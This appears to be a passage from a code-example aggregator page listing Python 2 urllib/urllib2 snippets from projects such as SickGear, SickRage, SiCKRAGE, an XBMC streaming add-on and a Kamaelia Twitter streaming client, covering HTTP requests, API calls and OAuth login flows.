        helpers.errorOnText(page, "That Microsoft account doesn\\'t exist", 'Authentication has not been passed: Invalid username')
        # check if there is a new terms of use
        helpers.errorOnText(page, '//account.live.com/tou/accrue', 'Please log in (log out first if necessary) through a browser and accept the Terms Of Use')

        contSubmitUrl = self.formAction.search(page)
        if contSubmitUrl == None:
            raise AuthenticationError("Could not find form action for continue page")
        url = contSubmitUrl.group(1)

        # get all form inputs
        formFields = self.inputNameValue.findall(page)
        postFields = {}
        for field in formFields:
            postFields[field[0]] = field[1]
        postFields = urllib.urlencode(postFields)

        # submit continue page
        request = urllib2.Request(url, postFields, self.httpHeaders)
        request.add_header("Referer", referer)
        with self.opener.open(request) as response:
            referer = response.geturl()
            page = helpers.getResponseBody(response)

        request = urllib2.Request(url = bingCommon.BING_URL, headers = self.httpHeaders)
        request.add_header("Referer", referer)
        with self.opener.open(request) as response:
            referer = response.geturl()

# if that's not bingCommon.BING_URL => authentication wasn't pass => write the page to the file and report
            if referer.find(bingCommon.BING_URL) == -1:
                try:
                    filename = helpers.dumpErrorPage(helpers.getResponseBody(response))
                    s = "check " + filename + " file for more information"
                except IOError:
                    s = "no further information could be provided - failed to write a file into " + \
                        helpers.RESULTS_DIR + " subfolder"
                raise AuthenticationError("Authentication has not been passed:\n" + s)

Example 31

Project: ShaniXBMCWork2
Source File: default.py
View license
def PlayLiveLink ( url ): 


	progress = xbmcgui.DialogProgress()
	progress.create('Progress', 'Fetching Streaming Info')
	progress.update( 10, "", "Finding links..", "" )

	if mode==7:
		req = urllib2.Request(url)
		req.add_header('User-Agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10')
		response = urllib2.urlopen(req)
		link=response.read()
		response.close()
		match =re.findall('"http.*(ebound).*?\?site=(.*?)"',link,  re.IGNORECASE)[0]
		cName=match[1]
		progress.update( 20, "", "Finding links..", "" )

	else:
		cName=url
	#match =re.findall('"http.*(ebound).*?\?site=(.*?)"',link,  re.IGNORECASE)[0]


	
	newURL='http://www.eboundservices.com/iframe/newads/iframe.php?stream='+ cName+'&width=undefined&height=undefined&clip=' + cName
	print newURL

	
	req = urllib2.Request(newURL)
	req.add_header('User-Agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10')
	response = urllib2.urlopen(req)
	link=response.read()
	response.close()
	progress.update( 50, "", "Finding links..", "" )

	
#	match =re.findall('<iframe.+src=\'(.*)\' frame',link,  re.IGNORECASE)
#	print match
#	req = urllib2.Request(match[0])
#	req.add_header('User-Agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10')
#	response = urllib2.urlopen(req)
#	link=response.read()
#	response.close()
	time = 2000  #in miliseconds
	defaultStreamType=0 #0 RTMP,1 HTTP
	defaultStreamType=selfAddon.getSetting( "DefaultStreamType" ) 
	print 'defaultStreamType',defaultStreamType
	if 1==2 and (linkType=="HTTP" or (linkType=="" and defaultStreamType=="1")): #disable http streaming for time being
#	print link
		line1 = "Playing Http Stream"
		xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,line1, time, __icon__))
		
		match =re.findall('MM_openBrWindow\(\'(.*)\',\'ebound\'', link,  re.IGNORECASE)
			
	#	print url
	#	print match
		
		strval = match[0]
		
		#listitem = xbmcgui.ListItem(name)
		#listitem.setInfo('video', {'Title': name, 'Genre': 'Live TV'})
		#playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO )
		#playlist.clear()
		#playlist.add (strval)
		
		#xbmc.Player().play(playlist)
		listitem = xbmcgui.ListItem( label = str(cName), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=strval )
		print "playing stream name: " + str(cName) 
		listitem.setInfo( type="video", infoLabels={ "Title": cName, "Path" : strval } )
		listitem.setInfo( type="video", infoLabels={ "Title": cName, "Plot" : cName, "TVShowTitle": cName } )
		xbmc.Player().play( str(strval), listitem)
	else:
		line1 = "Playing RTMP Stream"
		xbmc.executebuiltin('Notification(%s, %s, %d, %s)'%(__addonname__,line1, time, __icon__))
		progress.update( 60, "", "Finding links..", "" )

		post = {'username':'hash'}
		post = urllib.urlencode(post)
		req = urllib2.Request('http://eboundservices.com/flashplayerhash/index.php')
		req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36')
		response = urllib2.urlopen(req,post)
		link=response.read()
		response.close()
		

        
		print link
		#match =re.findall("=(.*)", link)

		#print url
		#print match

		strval =link # match[0]

		#listitem = xbmcgui.ListItem(name)
		#listitem.setInfo('video', {'Title': name, 'Genre': 'Live TV'})
		#playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO )
		#playlist.clear()
		#playlist.add (strval)

		playfile='rtmp://cdn.ebound.tv/tv?wmsAuthSign=/%s app=tv?wmsAuthSign=?%s swfurl=http://www.eboundservices.com/live/v6/player.swf?domain=&channel=%s&country=GB pageUrl=http://www.eboundservices.com/iframe/newads/iframe.php?stream=%s tcUrl=rtmp://cdn.ebound.tv/tv?wmsAuthSign=?%s live=true timeout=15'	% (cName,strval,cName,cName,strval)
		#playfile='rtmp://cdn.ebound.tv/tv?wmsAuthSign=/humtv app=tv?wmsAuthSign=?%s swfurl=http://www.eboundservices.com/live/v6/player.swf?domain=&channel=humtv&country=GB pageUrl=http://www.eboundservices.com/iframe/newads/iframe.php?stream=humtv tcUrl=rtmp://cdn.ebound.tv/tv?wmsAuthSign=?%s live=true'	% (strval,strval)
		progress.update( 100, "", "Almost done..", "" )
		print playfile
		#xbmc.Player().play(playlist)
		listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ) )
		print "playing stream name: " + str(name) 
		#listitem.setInfo( type="video", infoLabels={ "Title": name, "Path" : playfile } )
		#listitem.setInfo( type="video", infoLabels={ "Title": name, "Plot" : name, "TVShowTitle": name } )
		xbmc.Player(  ).play( playfile, listitem)
		#xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, listitem)

	return

Example 32

Project: SickGear
Source File: newznab.py
View license
    def _search_provider(self, search_params, **kwargs):

        api_key = self._check_auth()

        base_params = {'t': 'tvsearch',
                       'maxage': sickbeard.USENET_RETENTION or 0,
                       'limit': 100,
                       'attrs': 'rageid',
                       'offset': 0}

        if isinstance(api_key, basestring):
            base_params['apikey'] = api_key

        results = []
        total, cnt, search_url, exit_log = 0, len(results), '', False

        for mode in search_params.keys():
            for i, params in enumerate(search_params[mode]):

                # category ids
                cat = []
                cat_anime = ('5070', '6070')['nzbs_org' == self.get_id()]
                cat_sport = '5060'
                if 'Episode' == mode or 'Season' == mode:
                    if not ('rid' in params or 'tvdbid' in params or 'q' in params or not self.supports_tvdbid()):
                        logger.log('Error no rid, tvdbid, or search term available for search.')
                        continue

                    if self.show:
                        if self.show.is_sports:
                            cat = [cat_sport]
                        elif self.show.is_anime:
                            cat = [cat_anime]
                else:
                    cat = [cat_sport, cat_anime]

                if self.cat_ids or len(cat):
                    base_params['cat'] = ','.join(sorted(set(self.cat_ids.split(',') + cat)))

                request_params = base_params.copy()
                request_params.update(params)

                offset = 0
                batch_count = not 0

                # hardcoded to stop after a max of 4 hits (400 items) per query
                while (offset <= total) and (offset < (200, 400)[self.supports_tvdbid()]) and batch_count:
                    cnt = len(results)
                    search_url = '%sapi?%s' % (self.url, urllib.urlencode(request_params))

                    data = self.cache.getRSSFeed(search_url)
                    i and time.sleep(1.1)

                    if not data or not self.check_auth_from_data(data):
                        break

                    for item in data.entries:

                        title, url = self._title_and_url(item)
                        if title and url:
                            results.append(item)
                        else:
                            logger.log(u'The data returned from %s is incomplete, this result is unusable' % self.name,
                                       logger.DEBUG)

                    # get total and offset attribs
                    try:
                        if 0 == total:
                            total = int(data.feed.newznab_response['total'] or 0)
                            hits = (total / 100 + int(0 < (total % 100)))
                            hits += int(0 == hits)
                        offset = int(data.feed.newznab_response['offset'] or 0)
                    except AttributeError:
                        break

                    # No items found, prevent from doing another search
                    if 0 == total:
                        break

                    # Cache mode, prevent from doing another search
                    if 'Cache' == mode:
                        exit_log = True
                        break

                    if offset != request_params['offset']:
                        logger.log('Tell your newznab provider to fix their bloody newznab responses')
                        break

                    request_params['offset'] += request_params['limit']
                    if total <= request_params['offset']:
                        exit_log = True
                        logger.log('%s item%s found that will be used for episode matching' % (total, helpers.maybe_plural(total)),
                                   logger.DEBUG)
                        break

                    # there are more items available than the amount given in one call, grab some more
                    items = total - request_params['offset']
                    logger.log('%s more item%s to fetch from a batch of up to %s items.'
                               % (items, helpers.maybe_plural(items), request_params['limit']), logger.DEBUG)

                    batch_count = self._log_result(results, mode, cnt, search_url)

                if exit_log:
                    self._log_result(results, mode, cnt, search_url)
                    exit_log = False

                if 'tvdbid' in request_params and len(results):
                    break

        return results

Example 33

Project: SickRage
Source File: pushover.py
View license
    def _sendPushover(self, msg, title, sound=None, userKey=None, apiKey=None):
        """
        Sends a pushover notification to the address provided

        msg: The message to send (unicode)
        title: The title of the message
        sound: The notification sound to use
        userKey: The pushover user id to send the message to (or to subscribe with)
        apiKey: The pushover api key to use
        returns: True if the message succeeded, False otherwise
        """

        if userKey is None:
            userKey = sickbeard.PUSHOVER_USERKEY

        if apiKey is None:
            apiKey = sickbeard.PUSHOVER_APIKEY

        if sound is None:
            sound = sickbeard.PUSHOVER_SOUND

        logger.log(u"Pushover API KEY in use: " + apiKey, logger.DEBUG)

        # build up the URL and parameters
        msg = msg.strip()

        # send the request to pushover
        try:
            if sickbeard.PUSHOVER_SOUND != "default":
                args = {
                    "token": apiKey,
                    "user": userKey,
                    "title": title.encode('utf-8'),
                    "message": msg.encode('utf-8'),
                    "timestamp": int(time.time()),
                    "retry": 60,
                    "expire": 3600,
                    "sound": sound,
                }
            else:
                # sound is default, so don't send it
                args = {
                    "token": apiKey,
                    "user": userKey,
                    "title": title.encode('utf-8'),
                    "message": msg.encode('utf-8'),
                    "timestamp": int(time.time()),
                    "retry": 60,
                    "expire": 3600,
                }

            if sickbeard.PUSHOVER_DEVICE:
                args["device"] = sickbeard.PUSHOVER_DEVICE

            conn = httplib.HTTPSConnection("api.pushover.net:443")
            conn.request("POST", "/1/messages.json",
                         urllib.urlencode(args), {"Content-type": "application/x-www-form-urlencoded"})

        except urllib2.HTTPError as e:
            # if we get an error back that doesn't have an error code then who knows what's really happening
            if not hasattr(e, 'code'):
                logger.log(u"Pushover notification failed." + ex(e), logger.ERROR)
                return False
            else:
                logger.log(u"Pushover notification failed. Error code: " + str(e.code), logger.ERROR)

            # HTTP status 404 if the provided email address isn't a Pushover user.
            if e.code == 404:
                logger.log(u"Username is wrong/not a pushover email. Pushover will send an email to it", logger.WARNING)
                return False

            # For HTTP status code 401's, it is because you are passing in either an invalid token, or the user has not added your service.
            elif e.code == 401:

                # HTTP status 401 if the user doesn't have the service added
                subscribeNote = self._sendPushover(msg, title, sound=sound, userKey=userKey, apiKey=apiKey)
                if subscribeNote:
                    logger.log(u"Subscription sent", logger.DEBUG)
                    return True
                else:
                    logger.log(u"Subscription could not be sent", logger.ERROR)
                    return False

            # If you receive an HTTP status code of 400, it is because you failed to send the proper parameters
            elif e.code == 400:
                logger.log(u"Wrong data sent to pushover", logger.ERROR)
                return False

            # If you receive a HTTP status code of 429, it is because the message limit has been reached (free limit is 7,500)
            elif e.code == 429:
                logger.log(u"Pushover API message limit reached - try a different API key", logger.ERROR)
                return False

        logger.log(u"Pushover notification successful.", logger.INFO)
        return True

Example 34

Project: SiCKRAGE
Source File: sabnzbd.py
View license
    @staticmethod
    def sendNZB(nzb):
        """
        Sends an NZB to SABnzbd via the API.

        :param nzb: The NZBSearchResult object to send to SAB
        """

        # set up a dict with the URL params in it
        params = {}
        if sickrage.srCore.srConfig.SAB_USERNAME is not None:
            params['ma_username'] = sickrage.srCore.srConfig.SAB_USERNAME
        if sickrage.srCore.srConfig.SAB_PASSWORD is not None:
            params['ma_password'] = sickrage.srCore.srConfig.SAB_PASSWORD
        if sickrage.srCore.srConfig.SAB_APIKEY is not None:
            params['apikey'] = sickrage.srCore.srConfig.SAB_APIKEY
        category = sickrage.srCore.srConfig.SAB_CATEGORY
        if nzb.show.is_anime:
            category = sickrage.srCore.srConfig.SAB_CATEGORY_ANIME

        # if it aired more than 7 days ago, override with the backlog category IDs
        for curEp in nzb.episodes:
            if datetime.date.today() - curEp.airdate > datetime.timedelta(days=7):
                category = sickrage.srCore.srConfig.SAB_CATEGORY_BACKLOG
                if nzb.show.is_anime:
                    category = sickrage.srCore.srConfig.SAB_CATEGORY_ANIME_BACKLOG

        if category is not None:
            params['cat'] = category

        # use high priority if specified (recently aired episode)
        if nzb.priority == 1:
            if sickrage.srCore.srConfig.SAB_FORCED == 1:
                params['priority'] = 2
            else:
                params['priority'] = 1

        try:
            f = None

            # if it's a normal result we just pass SAB the URL
            if nzb.resultType == "nzb":
                # for newzbin results send the ID to sab specifically
                if nzb.provider.id == 'newzbin':
                    id = nzb.provider.getIDFromURL(nzb.url)
                    if not id:
                        sickrage.srCore.srLogger.error("Unable to send NZB to sab, can't find ID in URL " + str(nzb.url))
                        return False
                    params['mode'] = 'addid'
                    params['name'] = id
                else:
                    params['mode'] = 'addurl'
                    params['name'] = nzb.url

                url = sickrage.srCore.srConfig.SAB_HOST + "api?" + urllib.urlencode(params)
                sickrage.srCore.srLogger.info("Sending NZB to SABnzbd")
                sickrage.srCore.srLogger.debug("URL: " + url)

                # if we have the URL to an NZB then we've built up the SAB API URL already so just call it
                if nzb.resultType == "nzb":
                    f = urllib.urlopen(url)

            elif nzb.resultType == "nzbdata":
                params['mode'] = 'addfile'
                multiPartParams = {"nzbfile": (nzb.name + ".nzb", nzb.extraInfo[0])}

                url = sickrage.srCore.srConfig.SAB_HOST + "api?" + urllib.urlencode(params)
                sickrage.srCore.srLogger.info("Sending NZB to SABnzbd")
                sickrage.srCore.srLogger.debug("URL: " + url)

                cookies = cookielib.CookieJar()
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
                                              MultipartPostHandler.MultipartPostHandler)
                req = urllib2.Request(url, multiPartParams, headers={'User-Agent': sickrage.srCore.srConfig.USER_AGENT})
                f = opener.open(req)

        except (EOFError, IOError) as e:
            sickrage.srCore.srLogger.error("Unable to connect to SAB: {}".format(e.message))
            return False
        except httplib.InvalidURL as e:
            sickrage.srCore.srLogger.error("Invalid SAB host, check your config: {}".format(e.message))
            return False

        # this means we couldn't open the connection or something just as bad
        if f is None:
            sickrage.srCore.srLogger.error("No data returned from SABnzbd, NZB not sent")
            return False

        # if we opened the URL connection then read the result from SAB
        try:
            result = f.readlines()
        except Exception as e:
            sickrage.srCore.srLogger.error("Error trying to get result from SAB, NZB not sent: {}".format(e.message))
            return False

        # SAB shouldn't return a blank result, this most likely (but not always) means that it timed out and didn't recieve the NZB
        if len(result) == 0:
            sickrage.srCore.srLogger.error("No data returned from SABnzbd, NZB not sent")
            return False

        # massage the result a little bit
        sabText = result[0].strip()

        sickrage.srCore.srLogger.debug("Result text from SAB: " + sabText)

        # do some crude parsing of the result text to determine what SAB said
        if sabText == "ok":
            sickrage.srCore.srLogger.debug("NZB sent to SAB successfully")
            return True
        elif sabText == "Missing authentication":
            sickrage.srCore.srLogger.error("Incorrect username/password sent to SAB, NZB not sent")
            return False
        else:
            sickrage.srCore.srLogger.error("Unknown failure sending NZB to sab. Return text is: " + sabText)
            return False

Example 35

Project: python-api-wrapper
Source File: __init__.py
View license
    def _call(self, method, *args, **kwargs):
        """
        The workhorse. It's complicated, convoluted and beyond understanding of a mortal being.

        You have been warned.
        """

        queryparams = {}
        __offset__ = ApiConnector.LIST_LIMIT
        if "__offset__" in kwargs:
            offset = kwargs.pop("__offset__")
            queryparams['offset'] = offset
            __offset__ = offset + ApiConnector.LIST_LIMIT

        if "params" in kwargs:
            queryparams.update(kwargs.pop("params"))

        # create a closure to invoke this method again with a greater offset
        _cl_method = method
        _cl_args = tuple(args)
        _cl_kwargs = {}
        _cl_kwargs.update(kwargs)
        _cl_kwargs["__offset__"] = __offset__
        def continue_list_fetching():
            return self._call(method, *_cl_args, **_cl_kwargs)
        connector = self._get_connector()
        def filelike(v):
            if isinstance(v, file):
                return True
            if hasattr(v, "read"):
                return True
            return False 
        alternate_http_method = None
        if "_alternate_http_method" in kwargs:
            alternate_http_method = kwargs.pop("_alternate_http_method")
        urlparams = kwargs if kwargs else None
        use_multipart = False
        if urlparams is not None:
            fileargs = dict((key, value) for key, value in urlparams.iteritems() if filelike(value))
            use_multipart = bool(fileargs)

        # ensure the method has a trailing /
        if method[-1] != "/":
            method = method + "/"
        if args:
            method = "%s%s" % (method, "/".join(str(a) for a in args))

        scope = ''
        if self._scope:
            scopes = self._scope
            if connector.collapse_scope:
                scopes = scopes[-1:]
            scope = "/".join([sc._scope() for sc in scopes]) + "/"
        url = "http://%(host)s/%(base)s%(scope)s%(method)s%(queryparams)s" % dict(host=connector.host, method=method, base=connector._base, scope=scope, queryparams=self._create_query_string(queryparams))

        # we need to install SCRedirectHandler
        # to gather possible See-Other redirects
        # so that we can exchange our method
        redirect_handler = SCRedirectHandler()
        handlers = [redirect_handler]
        if USE_PROXY:
            handlers.append(urllib2.ProxyHandler({'http' : PROXY}))
        req = self._create_request(url, connector, urlparams, queryparams, alternate_http_method, use_multipart)

        http_method = req.get_method()
        if urlparams is not None:
            logger.debug("Posting url: %s, method: %s", url, http_method)
        else:
            logger.debug("Fetching url: %s, method: %s", url, http_method)

            
        if use_multipart:
            handlers.extend([MultipartPostHandler])            
        else:
            if urlparams is not None:
                urlparams = urllib.urlencode(urlparams.items(), True)
        opener = urllib2.build_opener(*handlers)
        try:
            handle = opener.open(req, urlparams)
        except NoResultFromRequest:
            return None
        except urllib2.HTTPError, e:
            if http_method == "GET" and e.code == 404:
                return None
            raise

        info = handle.info()
        ct = info['Content-Type']
        content = handle.read()
        logger.debug("Content-type:%s", ct)
        logger.debug("Request Content:\n%s", content)
        if redirect_handler.alternate_method is not None:
            method = connector.normalize_method(redirect_handler.alternate_method)
            logger.debug("Method changed through redirect to: <%s>", method)

        try:
            if "application/json" in ct:
                content = content.strip()
                #If linked partitioning is on, extract the URL to the next collection:
                partition_url = None
                if method.find('linked_partitioning=1') != -1:  
                  pattern = re.compile('(next_partition_href":")(.*?)(")')
                  if pattern.search(content):
                    partition_url = pattern.search(content).group(2)

                if not content:
                    content = "{}"
                try:
                    res = simplejson.loads(content)                    
                except:
                    logger.error("Couldn't decode returned json")
                    logger.error(content)
                    raise
                res = self._map(res, method, continue_list_fetching, partition_url)
                return res
            elif len(content) <= 1:
                # this might be the famous SeeOtherSpecialCase which means that
                # all that matters is just the method
                pass
            raise UnknownContentType("%s, returned:\n%s" % (ct, content))
        finally:
            handle.close()

Example 36

Project: kamaelia_
Source File: TwitterStream.oauth.py
View license
    def main(self):
        twitterurl = "http://stream.twitter.com/1/statuses/filter.json"

        # Configure authentication for Twitter - temporary until OAuth implemented
        #passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        #passman.add_password(None, twitterurl, self.username, self.password)
        #authhandler = urllib2.HTTPBasicAuthHandler(passman)

        # Configure proxy and opener
        if self.proxy:
            proxyhandler = urllib2.ProxyHandler({"http" : self.proxy})
            twitopener = urllib2.build_opener(proxyhandler)
        #else:
        #    twitopener = urllib2.build_opener(authhandler)


        headers = {'User-Agent' : "BBC R&D Grabber"}
        postdata = None

        if self.keypair == False:
            # Perform OAuth authentication
            request_token_url = 'http://api.twitter.com/oauth/request_token'
            access_token_url = 'http://api.twitter.com/oauth/access_token'
            authorize_url = 'http://api.twitter.com/oauth/authorize'

            token = None
            consumer = oauth.Consumer(key=self.consumerkeypair[0],secret=self.consumerkeypair[1])

            params = {
                        'oauth_version': "1.0",
                        'oauth_nonce': oauth.generate_nonce(),
                        'oauth_timestamp': int(time.time()),
                    }

            params['oauth_consumer_key'] = consumer.key

            req = oauth.Request(method="GET",url=request_token_url,parameters=params)

            signature_method = oauth.SignatureMethod_HMAC_SHA1()
            req.sign_request(signature_method, consumer, token)

            requestheaders = req.to_header()
            requestheaders['User-Agent'] = "BBC R&D Grabber"

            # Connect to Twitter
            try:
                req = urllib2.Request(request_token_url,None,requestheaders) # Why won't this work?!? Is it trying to POST?
                conn1 = urllib2.urlopen(req)
            except httplib.BadStatusLine, e:
                sys.stderr.write('PeopleSearch BadStatusLine error: ' + str(e) + '\n')
                conn1 = False
            except urllib2.HTTPError, e:
                sys.stderr.write('PeopleSearch HTTP error: ' + str(e.code) + '\n')
                conn1 = False
            except urllib2.URLError, e:
                sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                conn1 = False

            if conn1:
                content = conn1.read()
                conn1.close()
            #resp, content = client.request(request_token_url, "POST")
            #if resp['status'] != '200':
            #    raise Exception("Invalid response %s." % resp['status'])

                request_token = dict(urlparse.parse_qsl(content))

                print "Request Token:"
                print "     - oauth_token        = %s" % request_token['oauth_token']
                print "     - oauth_token_secret = %s" % request_token['oauth_token_secret']
                print

                # The user must confirm authorisation so a URL is printed here
                print "Go to the following link in your browser:"
                print "%s?oauth_token=%s" % (authorize_url, request_token['oauth_token'])
                print

                accepted = 'n'
                # Wait until the user has confirmed authorisation
                while accepted.lower() == 'n':
                    accepted = raw_input('Have you authorized me? (y/n) ')
                oauth_verifier = raw_input('What is the PIN? ')

                token = oauth.Token(request_token['oauth_token'],
                    request_token['oauth_token_secret'])
                token.set_verifier(oauth_verifier)
                #client = oauth.Client(consumer,token)
                params = {
                        'oauth_version': "1.0",
                        'oauth_nonce': oauth.generate_nonce(),
                        'oauth_timestamp': int(time.time()),
                        #'user': self.username
                    }

                params['oauth_token'] = token.key
                params['oauth_consumer_key'] = consumer.key

                req = oauth.Request(method="GET",url=access_token_url,parameters=params)

                signature_method = oauth.SignatureMethod_HMAC_SHA1()
                req.sign_request(signature_method, consumer, token)

                requestheaders = req.to_header()
                requestheaders['User-Agent'] = "BBC R&D Grabber"
                # Connect to Twitter
                try:
                    req = urllib2.Request(access_token_url,"oauth_verifier=%s" % oauth_verifier,requestheaders) # Why won't this work?!? Is it trying to POST?
                    conn1 = urllib2.urlopen(req)
                except httplib.BadStatusLine, e:
                    sys.stderr.write('PeopleSearch BadStatusLine error: ' + str(e) + '\n')
                    conn1 = False
                except urllib2.HTTPError, e:
                    sys.stderr.write('PeopleSearch HTTP error: ' + str(e.code) + '\n')
                    conn1 = False
                except urllib2.URLError, e:
                    sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                    conn1 = False

                if conn1:
                    content = conn1.read()
                    conn1.close()
                    access_token = dict(urlparse.parse_qsl(content))

                    # Access tokens retrieved from Twitter
                    print "Access Token:"
                    print "     - oauth_token        = %s" % access_token['oauth_token']
                    print "     - oauth_token_secret = %s" % access_token['oauth_token_secret']
                    print
                    print "You may now access protected resources using the access tokens above."
                    print

                    save = False
                    # Load config to save OAuth keys
                    try:
                        homedir = os.path.expanduser("~")
                        file = open(homedir + "/twitter-login.conf",'r')
                        save = True
                    except IOError, e:
                        print ("Failed to load config file - not saving oauth keys: " + str(e))

                    if save:
                        raw_config = file.read()

                        file.close()

                        # Read config and add new values
                        config = cjson.decode(raw_config)
                        config['key'] = access_token['oauth_token']

                        config['secret'] = access_token['oauth_token_secret']

                        raw_config = cjson.encode(config)

                        # Write out the new config file
                        try:
                            file = open(homedir + "/twitter-login.conf",'w')
                            file.write(raw_config)
                            file.close()
                        except IOError, e:
                            print ("Failed to save oauth keys: " + str(e))

                    self.keypair = [access_token['oauth_token'], access_token['oauth_token_secret']]


        while not self.finished():
            if self.dataReady("inbox"):

                # Receive keywords and PIDs
                recvdata = self.recv("inbox")
                keywords = recvdata[0]

                # Abide by Twitter's keyword limit of 400
                if len(keywords) > 400:
                    sys.stderr.write('TwitterStream keyword list too long - sending shortened list')
                    keywords = keywords[0:400:1]
                    
                pids = recvdata[1]

                # Create POST data
                data = urllib.urlencode({"track": ",".join(keywords)})
                print ("Got keywords: " + data)

                # If using firehose, filtering based on keywords will be carried out AFTER grabbing data
                # This will be done here rather than by Twitter

                # Get ready to grab Twitter data
                urllib2.install_opener(twitopener)

                params = {
                    'oauth_version': "1.0",
                    'oauth_nonce': oauth.generate_nonce(),
                    'oauth_timestamp': int(time.time()),
                    #'user': self.username
                }

                token = oauth.Token(key=self.keypair[0],secret=self.keypair[1])
                consumer = oauth.Consumer(key=self.consumerkeypair[0],secret=self.consumerkeypair[1])

                params['oauth_token'] = token.key
                params['oauth_consumer_key'] = consumer.key

                req = oauth.Request(method="POST",url=twitterurl,parameters=params)

                signature_method = oauth.SignatureMethod_HMAC_SHA1()
                req.sign_request(signature_method, consumer, token)

                requestheaders = req.to_header()
                requestheaders['User-Agent'] = "BBC R&D Grabber"
                requestheaders['Keep-Alive'] = self.timeout
                requestheaders['Connection'] = "Keep-Alive"
                print requestheaders

                # Identify the client and add a keep alive message using the same timeout assigned to the socket
                #headers = {'User-Agent' : "BBC R&D Grabber", "Keep-Alive" : self.timeout, "Connection" : "Keep-Alive"}

                # Connect to Twitter
                try:
                    req = urllib2.Request(twitterurl,data,requestheaders)
                    conn1 = urllib2.urlopen(req,None,self.timeout)
                    self.backofftime = 1 # Reset the backoff time
                    print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                    file = open("streamDebug.txt", 'r')
                    filecontents = file.read()
                    file.close()
                    file = open("streamDebug.txt", 'w')
                    file.write(filecontents + "\n" + str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                    file.close()
                except httplib.BadStatusLine, e:
                    sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except urllib2.HTTPError, e:
                    sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                    sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                    # Major error assumed - long backoff
                    if e.code > 200:
                        if self.backofftime == 1:
                            self.backofftime = 10
                        else:
                            self.backofftime *= 2
                        if self.backofftime > 240:
                            self.backofftime = 240
                    conn1 = False
                except urllib2.URLError, e:
                    sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except socket.timeout, e:
                    sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False

                if conn1:
                    # While no new keywords have been passed in...
                    while not self.dataReady("inbox"):
                        # Collect data from the streaming API as it arrives - separated by carriage returns.
                        try:
                            content = ""
                            # Timer attempt to fix connection hanging
                            # Could possibly force this to generate an exception otherwise - can't be sure if that will stop the read though
                            readtimer = Timer(self.timeout,conn1.close)
                            readtimer.start()
                            while not "\r\n" in content: # Twitter specified watch characters - readline doesn't catch this properly
                                content += conn1.read(1)
                            readtimer.cancel()
                            # Below modified to ensure reconnection is attempted if the timer expires
                            if "\r\n" in content:
                                self.send([content,pids],"outbox") # Send to data collector / analyser rather than back to requester
                                failed = False
                            else:
                                failed = True
                        except IOError, e:
                            sys.stderr.write('TwitterStream IO error: ' + str(e) + '\n')
                            failed = True
                        except Axon.AxonExceptions.noSpaceInBox, e:
                            # Ignore data - no space to send out
                            sys.stderr.write('TwitterStream no space in box error: ' + str(e) + '\n')
                            failed = True
                        except socket.timeout, e:
                            sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                            # General network error assumed - short backoff
                            self.backofftime += 1
                            if self.backofftime > 16:
                                self.backofftime = 16
                            failed = True
                        except TypeError, e:
                            # This pretty much means the connection failed - so let's deal with it
                            sys.stderr.write('TwitterStream TypeError - conn1 failure: ' + str(e) + '\n')
                            failed = True
                        if failed == True and self.reconnect == True:
                            # Reconnection procedure
                            print (str(datetime.utcnow()) + " Streaming API connection failed.")
                            file = open("streamDebug.txt", 'r')
                            filecontents = file.read()
                            file.close()
                            file = open("streamDebug.txt", 'w')
                            file.write(filecontents + "\n" + str(datetime.utcnow()) + " Streaming API connection failed")
                            file.close()
                            conn1.close()
                            if self.backofftime > 1:
                                print ("Backing off for " + str(self.backofftime) + " seconds.")
                            time.sleep(self.backofftime)
                            print (str(datetime.utcnow()) + " Attempting reconnection...")
                            file = open("streamDebug.txt", 'r')
                            filecontents = file.read()
                            file.close()
                            file = open("streamDebug.txt", 'w')
                            file.write(filecontents + "\n" + str(datetime.utcnow()) + " Attempting reconnection...")
                            file.close()
                            try:
                                urllib2.install_opener(twitopener)
                                req = urllib2.Request(twitterurl,data,headers)
                                conn1 = urllib2.urlopen(req,None,self.timeout)
                                self.backofftime = 1
                                print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                                file = open("streamDebug.txt", 'r')
                                filecontents = file.read()
                                file.close()
                                file = open("streamDebug.txt", 'w')
                                file.write(filecontents + "\n" + str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                                file.close()
                            except httplib.BadStatusLine, e:
                                sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                                # General network error assumed - short backoff
